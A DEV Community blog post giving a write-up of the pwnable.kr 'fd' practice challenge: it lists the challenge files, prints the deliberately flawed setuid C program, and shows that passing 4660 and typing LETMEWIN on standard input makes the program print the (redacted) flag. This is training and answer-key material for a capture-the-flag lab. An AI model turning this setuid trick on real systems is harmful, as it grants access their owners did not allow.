DEV Community

Cover image for [pwnable.kr] fd writeup
Hyunseung Ha
Hyunseung Ha

Posted on

[pwnable.kr] fd writeup

ls -al
total 40
drwxr-x---   5 root   fd   4096 Oct 26  2016 .
drwxr-xr-x 116 root   root 4096 Nov 11  2021 ..
d---------   2 root   root 4096 Jun 12  2014 .bash_history
-r-sr-x---   1 fd_pwn fd   7322 Jun 11  2014 fd
-rw-r--r--   1 root   root  418 Jun 11  2014 fd.c
-r--r-----   1 fd_pwn root   50 Jun 11  2014 flag
-rw-------   1 root   root  128 Oct 26  2016 .gdb_history
dr-xr-xr-x   2 root   root 4096 Dec 19  2016 .irssi
drwxr-xr-x   2 root   root 4096 Oct 23  2016 .pwntools-cache
Enter fullscreen mode Exit fullscreen mode

The file we want to read is a flag file, and only the fd_pwn owner or the root user can read the file.
BUT we are fd now.
So we should be the fd_pwn to gain proper permission.
fd has SetUID to fd_pwn. We can use it to gain access.

Look the source file up:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
    if(argc<2){
        printf("pass argv[1] a number\n");
        return 0;
    }
    int fd = atoi( argv[1] ) - 0x1234;
    int len = 0;
    len = read(fd, buf, 32);
    if(!strcmp("LETMEWIN\n", buf)){
        printf("good job :)\n");
        system("/bin/cat flag");
        exit(0);
    }
    printf("learn about Linux file IO\n");
    return 0;

}
Enter fullscreen mode Exit fullscreen mode

We have to put an argument value, and if we put 0x1234 in the argument value, fd = 0 so that we can use standard input (keyboard) to input. After that we can set buf to LETMEWIN via standard input.
0x1234 is 4660 in decimal, so run following command to get the desired result:

./fd 4660
LETMEWIN
good job :)
_FLAG_
Enter fullscreen mode Exit fullscreen mode

Top comments (0)